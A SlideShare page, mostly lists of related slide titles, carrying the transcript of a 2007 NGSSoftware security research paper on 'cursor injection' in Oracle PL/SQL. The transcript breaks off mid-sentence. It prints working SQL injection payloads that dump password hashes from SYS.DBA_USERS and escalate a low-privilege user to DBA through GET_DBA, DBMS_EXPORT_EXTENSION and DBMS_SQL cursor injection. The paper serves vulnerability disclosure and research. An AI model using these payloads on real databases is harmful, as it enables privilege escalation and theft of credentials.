Demystifying Drupal AJAX Callback CommandsDemystifying Drupal AJAX Callback Commands
Demystifying Drupal AJAX Callback CommandsMichael Miles
 
(국비지원학원/재직자교육/실업자교육/IT실무교육_탑크리에듀)#4.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)
(국비지원학원/재직자교육/실업자교육/IT실무교육_탑크리에듀)#4.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)(국비지원학원/재직자교육/실업자교육/IT실무교육_탑크리에듀)#4.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)
(국비지원학원/재직자교육/실업자교육/IT실무교육_탑크리에듀)#4.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)탑크리에듀(구로디지털단지역3번출구 2분거리)
 
Function & procedure
Function & procedureFunction & procedure
Function & procedureatishupadhyay
 
04 Handling Exceptions
04 Handling Exceptions04 Handling Exceptions
04 Handling Exceptionsrehaniltifat
 
23 ijaprr vol1-3-25-31iqra
23 ijaprr vol1-3-25-31iqra23 ijaprr vol1-3-25-31iqra
23 ijaprr vol1-3-25-31iqraijaprr_editor
 
Distributing information on iOS
Distributing information on iOSDistributing information on iOS
Distributing information on iOSMake School
 
MidCamp 2016 - Demystifying AJAX Callback Commands in Drupal 8
MidCamp 2016 - Demystifying AJAX Callback Commands in Drupal 8MidCamp 2016 - Demystifying AJAX Callback Commands in Drupal 8
MidCamp 2016 - Demystifying AJAX Callback Commands in Drupal 8Michael Miles
 

What's hot (20)

Demystifying AJAX Callback Commands in Drupal 8
Demystifying AJAX Callback Commands in Drupal 8Demystifying AJAX Callback Commands in Drupal 8
Demystifying AJAX Callback Commands in Drupal 8
 
Identifing Listeners and Filters
Identifing Listeners and FiltersIdentifing Listeners and Filters
Identifing Listeners and Filters
 
Chapter09
Chapter09Chapter09
Chapter09
 
#34.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자교육,국...
#34.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자교육,국...#34.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자교육,국...
#34.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)_스프링프레임워크 강좌, 재직자환급교육,실업자교육,국...
 
Drupal8Day: Demystifying Drupal 8 Ajax Callback commands
Drupal8Day: Demystifying Drupal 8 Ajax Callback commandsDrupal8Day: Demystifying Drupal 8 Ajax Callback commands
Drupal8Day: Demystifying Drupal 8 Ajax Callback commands
 
New and improved hacking oracle from web apps sumit sidharth
New and improved hacking oracle from web apps sumit sidharthNew and improved hacking oracle from web apps sumit sidharth
New and improved hacking oracle from web apps sumit sidharth
 
6.Spring DI_1
6.Spring DI_16.Spring DI_1
6.Spring DI_1
 
Spring AOP
Spring AOPSpring AOP
Spring AOP
 
[Www.pkbulk.blogspot.com]dbms07
[Www.pkbulk.blogspot.com]dbms07[Www.pkbulk.blogspot.com]dbms07
[Www.pkbulk.blogspot.com]dbms07
 
Demystifying Drupal AJAX Callback Commands
Demystifying Drupal AJAX Callback CommandsDemystifying Drupal AJAX Callback Commands
Demystifying Drupal AJAX Callback Commands
 
(국비지원학원/재직자교육/실업자교육/IT실무교육_탑크리에듀)#4.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)
(국비지원학원/재직자교육/실업자교육/IT실무교육_탑크리에듀)#4.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)(국비지원학원/재직자교육/실업자교육/IT실무교육_탑크리에듀)#4.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)
(국비지원학원/재직자교육/실업자교육/IT실무교육_탑크리에듀)#4.스프링프레임워크 & 마이바티스 (Spring Framework, MyBatis)
 
Function & procedure
Function & procedureFunction & procedure
Function & procedure
 
04 Handling Exceptions
04 Handling Exceptions04 Handling Exceptions
04 Handling Exceptions
 
Testy integracyjne
Testy integracyjneTesty integracyjne
Testy integracyjne
 
PL/SQL TRIGGERS
PL/SQL TRIGGERSPL/SQL TRIGGERS
PL/SQL TRIGGERS
 
AutoComplete
AutoCompleteAutoComplete
AutoComplete
 
23 ijaprr vol1-3-25-31iqra
23 ijaprr vol1-3-25-31iqra23 ijaprr vol1-3-25-31iqra
23 ijaprr vol1-3-25-31iqra
 
Sql Functions And Procedures
Sql Functions And ProceduresSql Functions And Procedures
Sql Functions And Procedures
 
Distributing information on iOS
Distributing information on iOSDistributing information on iOS
Distributing information on iOS
 
MidCamp 2016 - Demystifying AJAX Callback Commands in Drupal 8
MidCamp 2016 - Demystifying AJAX Callback Commands in Drupal 8MidCamp 2016 - Demystifying AJAX Callback Commands in Drupal 8
MidCamp 2016 - Demystifying AJAX Callback Commands in Drupal 8
 

Viewers also liked

Oss forensics fosscomm_2011
Oss forensics fosscomm_2011Oss forensics fosscomm_2011
Oss forensics fosscomm_2011fangjiafu
 
Wce internals rooted_con2011_ampliasecurity
Wce internals rooted_con2011_ampliasecurityWce internals rooted_con2011_ampliasecurity
Wce internals rooted_con2011_ampliasecurityfangjiafu
 
Oracle forensics 101
Oracle forensics 101Oracle forensics 101
Oracle forensics 101fangjiafu
 
Wce12 uba ampliasecurity_eng
Wce12 uba ampliasecurity_engWce12 uba ampliasecurity_eng
Wce12 uba ampliasecurity_engfangjiafu
 
Santorini island. 2
Santorini island. 2Santorini island. 2
Santorini island. 2Nikos
 
Understanding and selecting_dsp_final
Understanding and selecting_dsp_finalUnderstanding and selecting_dsp_final
Understanding and selecting_dsp_finalfangjiafu
 
Ddos analizi
Ddos analiziDdos analizi
Ddos analizifangjiafu
 

Viewers also liked (7)

Oss forensics fosscomm_2011
Oss forensics fosscomm_2011Oss forensics fosscomm_2011
Oss forensics fosscomm_2011
 
Wce internals rooted_con2011_ampliasecurity
Wce internals rooted_con2011_ampliasecurityWce internals rooted_con2011_ampliasecurity
Wce internals rooted_con2011_ampliasecurity
 
Oracle forensics 101
Oracle forensics 101Oracle forensics 101
Oracle forensics 101
 
Wce12 uba ampliasecurity_eng
Wce12 uba ampliasecurity_engWce12 uba ampliasecurity_eng
Wce12 uba ampliasecurity_eng
 
Santorini island. 2
Santorini island. 2Santorini island. 2
Santorini island. 2
 
Understanding and selecting_dsp_final
Understanding and selecting_dsp_finalUnderstanding and selecting_dsp_final
Understanding and selecting_dsp_final
 
Ddos analizi
Ddos analiziDdos analizi
Ddos analizi
 

Similar to Exploiting PL/SQL Injection Without Privileges

Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_wormDefcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_wormguest785f78
 
L9 l10 server side programming
L9 l10 server side programmingL9 l10 server side programming
L9 l10 server side programmingRushdi Shams
 
Error management
Error managementError management
Error managementdaniil3
 
07 Using Oracle-Supported Package in Application Development
07 Using Oracle-Supported Package in Application Development07 Using Oracle-Supported Package in Application Development
07 Using Oracle-Supported Package in Application Developmentrehaniltifat
 
Chapter 14 sql injection
Chapter 14 sql injectionChapter 14 sql injection
Chapter 14 sql injectionnewbie2019
 
OTech magazine article - Principle of Least Privilege
OTech magazine article - Principle of Least PrivilegeOTech magazine article - Principle of Least Privilege
OTech magazine article - Principle of Least PrivilegeBiju Thomas
 
Advanced plsql mock_assessment
Advanced plsql mock_assessmentAdvanced plsql mock_assessment
Advanced plsql mock_assessmentSaurabh K. Gupta
 
Sql Injection Attacks(Part1 4)
Sql Injection Attacks(Part1 4)Sql Injection Attacks(Part1 4)
Sql Injection Attacks(Part1 4)Hongyang Wang
 
Relational Database Management System
Relational Database Management SystemRelational Database Management System
Relational Database Management Systemsweetysweety8
 
Oracle - Program with PL/SQL - Lession 11
Oracle - Program with PL/SQL - Lession 11Oracle - Program with PL/SQL - Lession 11
Oracle - Program with PL/SQL - Lession 11Thuan Nguyen
 
Introduction to PLSQL.PPT
Introduction to PLSQL.PPTIntroduction to PLSQL.PPT
Introduction to PLSQL.PPTSujayaBiju
 
Hack your db before the hackers do
Hack your db before the hackers doHack your db before the hackers do
Hack your db before the hackers dofangjiafu
 
Oracle APEX Performance
Oracle APEX PerformanceOracle APEX Performance
Oracle APEX PerformanceScott Wesley
 
Subqueries views stored procedures_triggers_transactions
Subqueries views stored procedures_triggers_transactionsSubqueries views stored procedures_triggers_transactions
Subqueries views stored procedures_triggers_transactionsmaxpane
 
Tony jambu (obscure) tools of the trade for tuning oracle sq ls
Tony jambu (obscure) tools of the trade for tuning oracle sq lsTony jambu (obscure) tools of the trade for tuning oracle sq ls
Tony jambu (obscure) tools of the trade for tuning oracle sq lsInSync Conference
 

Similar to Exploiting PL/SQL Injection Without Privileges (20)

Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_wormDefcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
Defcon_Oracle_The_Making_of_the_2nd_sql_injection_worm
 
L9 l10 server side programming
L9 l10 server side programmingL9 l10 server side programming
L9 l10 server side programming
 
Error management
Error managementError management
Error management
 
Intro to Laravel 4
Intro to Laravel 4Intro to Laravel 4
Intro to Laravel 4
 
07 Using Oracle-Supported Package in Application Development
07 Using Oracle-Supported Package in Application Development07 Using Oracle-Supported Package in Application Development
07 Using Oracle-Supported Package in Application Development
 
Sql injection
Sql injectionSql injection
Sql injection
 
Chapter 14 sql injection
Chapter 14 sql injectionChapter 14 sql injection
Chapter 14 sql injection
 
OTech magazine article - Principle of Least Privilege
OTech magazine article - Principle of Least PrivilegeOTech magazine article - Principle of Least Privilege
OTech magazine article - Principle of Least Privilege
 
Advanced plsql mock_assessment
Advanced plsql mock_assessmentAdvanced plsql mock_assessment
Advanced plsql mock_assessment
 
Sql injection
Sql injectionSql injection
Sql injection
 
Sql Injection Attacks(Part1 4)
Sql Injection Attacks(Part1 4)Sql Injection Attacks(Part1 4)
Sql Injection Attacks(Part1 4)
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
Relational Database Management System
Relational Database Management SystemRelational Database Management System
Relational Database Management System
 
Oracle - Program with PL/SQL - Lession 11
Oracle - Program with PL/SQL - Lession 11Oracle - Program with PL/SQL - Lession 11
Oracle - Program with PL/SQL - Lession 11
 
Introduction to PLSQL.PPT
Introduction to PLSQL.PPTIntroduction to PLSQL.PPT
Introduction to PLSQL.PPT
 
Hack your db before the hackers do
Hack your db before the hackers doHack your db before the hackers do
Hack your db before the hackers do
 
Sql injection
Sql injectionSql injection
Sql injection
 
Oracle APEX Performance
Oracle APEX PerformanceOracle APEX Performance
Oracle APEX Performance
 
Subqueries views stored procedures_triggers_transactions
Subqueries views stored procedures_triggers_transactionsSubqueries views stored procedures_triggers_transactions
Subqueries views stored procedures_triggers_transactions
 
Tony jambu (obscure) tools of the trade for tuning oracle sq ls
Tony jambu (obscure) tools of the trade for tuning oracle sq lsTony jambu (obscure) tools of the trade for tuning oracle sq ls
Tony jambu (obscure) tools of the trade for tuning oracle sq ls
 

More from fangjiafu

Create user to_sysdba
Create user to_sysdbaCreate user to_sysdba
Create user to_sysdbafangjiafu
 
Presentation nix
Presentation nixPresentation nix
Presentation nixfangjiafu
 
Layer 7 ddos
Layer 7 ddosLayer 7 ddos
Layer 7 ddosfangjiafu
 
Tlsoptimizationprint 120224194603-phpapp02
Tlsoptimizationprint 120224194603-phpapp02Tlsoptimizationprint 120224194603-phpapp02
Tlsoptimizationprint 120224194603-phpapp02fangjiafu
 
Presentation nix
Presentation nixPresentation nix
Presentation nixfangjiafu
 
Proper passwordhashing
Proper passwordhashingProper passwordhashing
Proper passwordhashingfangjiafu
 
Burp suite injection中的应用by小冰
Burp suite injection中的应用by小冰Burp suite injection中的应用by小冰
Burp suite injection中的应用by小冰fangjiafu
 
2008 07-24 kwpm-threads_and_synchronization
2008 07-24 kwpm-threads_and_synchronization2008 07-24 kwpm-threads_and_synchronization
2008 07-24 kwpm-threads_and_synchronizationfangjiafu
 
Network security
Network securityNetwork security
Network securityfangjiafu
 
Cloud computing security
Cloud computing securityCloud computing security
Cloud computing securityfangjiafu
 
Layer one 2011-sam-bowne-layer-7-dos
Layer one 2011-sam-bowne-layer-7-dosLayer one 2011-sam-bowne-layer-7-dos
Layer one 2011-sam-bowne-layer-7-dosfangjiafu
 
Sqlmap readme
Sqlmap readmeSqlmap readme
Sqlmap readmefangjiafu
 

More from fangjiafu (20)

Create user to_sysdba
Create user to_sysdbaCreate user to_sysdba
Create user to_sysdba
 
Presentation nix
Presentation nixPresentation nix
Presentation nix
 
Layer 7 ddos
Layer 7 ddosLayer 7 ddos
Layer 7 ddos
 
Tlsoptimizationprint 120224194603-phpapp02
Tlsoptimizationprint 120224194603-phpapp02Tlsoptimizationprint 120224194603-phpapp02
Tlsoptimizationprint 120224194603-phpapp02
 
Crypto hlug
Crypto hlugCrypto hlug
Crypto hlug
 
Fp
FpFp
Fp
 
Presentation nix
Presentation nixPresentation nix
Presentation nix
 
Rr 7944
Rr 7944Rr 7944
Rr 7944
 
Proper passwordhashing
Proper passwordhashingProper passwordhashing
Proper passwordhashing
 
Burp suite injection中的应用by小冰
Burp suite injection中的应用by小冰Burp suite injection中的应用by小冰
Burp suite injection中的应用by小冰
 
Oech03
Oech03Oech03
Oech03
 
2008 07-24 kwpm-threads_and_synchronization
2008 07-24 kwpm-threads_and_synchronization2008 07-24 kwpm-threads_and_synchronization
2008 07-24 kwpm-threads_and_synchronization
 
Unit07
Unit07Unit07
Unit07
 
Unit05
Unit05Unit05
Unit05
 
Network security
Network securityNetwork security
Network security
 
Ids
IdsIds
Ids
 
Cloud computing security
Cloud computing securityCloud computing security
Cloud computing security
 
Layer one 2011-sam-bowne-layer-7-dos
Layer one 2011-sam-bowne-layer-7-dosLayer one 2011-sam-bowne-layer-7-dos
Layer one 2011-sam-bowne-layer-7-dos
 
Sqlmap readme
Sqlmap readmeSqlmap readme
Sqlmap readme
 
Wisr2011 en
Wisr2011 enWisr2011 en
Wisr2011 en
 

Recently uploaded

Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024The Digital Insurer
 
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024BookNet Canada
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGMarianaLemus7
 

Recently uploaded (20)

Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024My INSURER PTE LTD - Insurtech Innovation Award 2024
My INSURER PTE LTD - Insurtech Innovation Award 2024
 
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDG
 

Exploiting PL/SQL Injection Without Privileges

  • 1. Cursor Injection - A New Method for Exploiting PL/SQL Injection and Potential Defences David Litchfield [davidl@ngssoftware.com] 24th February 2007 An NGSSoftware Insight Security Research (NISR) Publication ©2007 Next Generation Security Software Ltd http://www.ngssoftware.com
  • 2. Introduction On occasion Oracle in their alerts state that the ability to create a procedure or a function is required for an attacker to be able to exploit a flaw. For example, DB02 in the October 2006 Critical Patch Update was for a vulnerability in the SDO_DROP_USER_BEFORE trigger. In the Risk Matrix section of the alert it states that an attacker must have the CREATE PROCEDURE privilege to exploit the flaw. As we will see this is not the case. This paper describes a new method whereby an attacker, seeking to exploit a SQL injection flaw in an Oracle database server, may do so without the need to create an auxiliary inject function in order to execute arbitrary SQL. This is achieved by injecting a pre-compiled cursor into vulnerable PL/SQL objects. The driving force behind this research is to show that all SQL injection flaws can be fully exploited without any system privilege other than CREATE SESSION and accordingly the risk should never be "marked down". The problem for the attacker... Consider the following PL/SQL procedure: CONNECT / AS SYSDBA CREATE OR REPLACE PROCEDURE GET_OWNER (P_OBJNM VARCHAR) IS TYPE C_TYPE IS REF CURSOR; CV C_TYPE; BUFFER VARCHAR2(200); BEGIN DBMS_OUTPUT.ENABLE(1000000); OPEN CV FOR 'SELECT OWNER FROM ALL_OBJECTS WHERE OBJECT_NAME = ''' || P_OBJNM ||''''; LOOP FETCH CV INTO BUFFER; DBMS_OUTPUT.PUT_LINE(BUFFER); EXIT WHEN CV%NOTFOUND; END LOOP; CLOSE CV; END; / GRANT EXECUTE ON GET_OWNER TO PUBLIC; It is vulnerable to SQL injection. The P_OBJNM parameter is embedded within a SELECT query which is then executed. Due to the fact that Oracle won't batch queries, for example like Microsoft SQL Server, the attacker is limited in terms of what they could do when it comes to exploiting the flaw. One thing the attacker could do is perform a UNION SELECT to gain access to arbitrary data: SQL> CONNECT SCOTT/PASSWORD Connected. SQL> SET SERVEROUTPUT ON SQL> EXEC SYS.GET_OWNER('AAAA'' UNION SELECT PASSWORD FROM SYS.DBA_USERS -- '); 16B58553D83807DF
  • 3. 1718E5DBB8F89784 24ABAB8B06281B4C ... ... What if they wanted to do more than just this, though, and perform a DDL or DML operation? In Oracle, the attacker could not simply inject a "GRANT DBA TO PUBLIC" or an "INSERT something into some table" statement after the application defined SELECT statement. In order to achieve this, they'd need to wrap their arbitrary SQL in a function and inject this: SQL> CREATE OR REPLACE FUNCTION GET_DBA RETURN VARCHAR AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION; 3 BEGIN 4 EXECUTE IMMEDIATE 'GRANT DBA TO PUBLIC'; 5 RETURN 'GOT_DBA_PRIVS'; 6 END; 7 / Function created. SQL> EXEC SYS.GET_OWNER('AAAA''||SCOTT.GET_DBA--'); PL/SQL procedure successfully completed. SQL> SET ROLE DBA; Role set. Here, SCOTT has created a function called GET_DBA and this is then injected into the application defined SELECT query using the concatenation operator - the double pipe. As part of executing the SELECT query the database server also executes the GET_DBA function with SYS privileges and the GRANT succeeds. This GET_DBA function is an auxiliary inject function and it performs the real work of the exploit. If an attacker can't create their own functions then they must find a function that already exists on the system - a function that allows them to execute arbitrary SQL. Prior to April 2006, when the flaw was patched, the GET_DOMAIN_INDEX_TABLES function on the SYS owned DBMS_EXPORT_EXTENSION package could be used: SQL> SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTP UT".PUT(:P1); EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION; BEGIN EXECUTE IMMEDIATE ''''GRANT DBA TO PUBLIC''''; END;''; END;-- ','SYS',0,'1',0) This package was vulnerable to SQL injection and attacker supplied arguments were embedded into a block of anonymous PL/SQL. As PUBLIC could directly execute this package they could execute arbitrary SQL using this function alone - there was no need to inject it into another vulnerable package. As already stated, this has since been fixed. There are two other functions that can be used as auxiliary inject functions, however, they
  • 4. can only be used as such due to a flaw. One is vulnerable to a cursor snarfing issue [see http://www.databasesecurity.com/dbsec/cursor-snarfing.pdf] that can be exploited to run arbitrary SQL as SYS and the other is vulnerable to a SQL injection flaw into an anonymous PL/SQL block, again allowing an attacker to execute arbitrary SQL as SYS. Both are currently being fixed by Oracle and until the patch is out they will remain "nameless". Each of the three known extant functions that can be used as auxiliaries contain a vulnerability of some sort and will all be patched at some stage making their "usefulness" time limited. There is what could be argued as a fourth function that can be abused by an attacker to execute arbitrary SQL and it doesn't rely on a vulnerability. I say "could be argued" because it's not as straight forward as simply injecting the function - it needs to be primed first. What follows is a description of the new method: it is simple multi-stage attack (so simple in fact I should have thought of it years ago!) and it works on all versions of Oracle and can be exploited by an attacker to run any SQL - provided of course there is a vector - i.e. a PL/SQL package, procedure, function, trigger or type which is vulnerable to SQL injection. The DBMS_SQL package The DBMS_SQL package contains a number of procedures and functions that can be used to execute dynamic SQL queries: SQL> CONNECT SCOTT/PASSWORD Connected. SQL> DECLARE 2 MY_CURSOR NUMBER; 3 RESULT NUMBER; 4 BEGIN 5 MY_CURSOR := DBMS_SQL.OPEN_CURSOR; 6 DBMS_SQL.PARSE(MY_CURSOR,'SELECT 1 FROM DUAL',0); 7 RESULT := DBMS_SQL.EXECUTE(MY_CURSOR); 8 DBMS_SQL.CLOSE_CURSOR(MY_CURSOR); 9 END; 10 / PL/SQL procedure successfully completed. Here, we create a cursor called "MY_CURSOR" using the DBMS_SQL.OPEN_CURSOR function. We then tie this cursor to a query, in this case "SELECT 1 FROM DUAL", by using the DBMS_SQL.PARSE procedure. By doing this, the cursor becomes like a handle to this query which is then executed using the DBMS_SQL.EXECUTE function. Lastly the cursor is closed. All an attacker need do to execute arbitrary SQL in open a cursor and parse the SQL and then inject the DBMS_SQL.EXECUTE function into the vulnerable PL/SQL object: SQL> CONNECT SCOTT/PASSWORD Connected. SQL> SET SERVEROUTPUT ON
  • 5. SQL> DECLARE 2 MY_CURSOR NUMBER; 3 RESULT NUMBER; 4 BEGIN 5 MY_CURSOR := DBMS_SQL.OPEN_CURSOR; 6 DBMS_SQL.PARSE(MY_CURSOR,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to public''; commit; end;',0); 7 DBMS_OUTPUT.PUT_LINE('Cursor value is :' || MY_CURSOR); 8 END; 9 / Cursor value is :4 PL/SQL procedure successfully completed. SQL> EXEC SYS.GET_OWNER('AAAA''||CHR(DBMS_SQL.EXECUTE(4))--'); PL/SQL procedure successfully completed. SQL> SET ROLE DBA; Role set. Firstly, we open the cursor and then parse our query - one that'll grant DBA privileges to PUBLIC. We then print the value of the cursor to the screen - 4 in this case. We then pass 4 as the argument to the DBMS_SQL.EXECUTE function when we inject it into the vulnerable procedure. The DBMS_SQL.EXECUTE function returns a number so we use the CHR function to convert the number to a character - which can then be concatenated. When the application defined SELECT query executes so too does the DBMS_SQL.EXECUTE function - and so the attacker's SQL is executed with SYS privileges - in this case granting DBA privileges to PUBLIC. Only Half-primed... Assume, rather than execute 'GRANT DBA TO PUBLIC', which might alert an intrusion detection/prevention system, the attacker wishes to perform an INSERT to achieve the same end, in other words, INSERT the relevant rows into the SYS.SYSAUTH$ table to make PUBLIC a DBA. At this stage, this 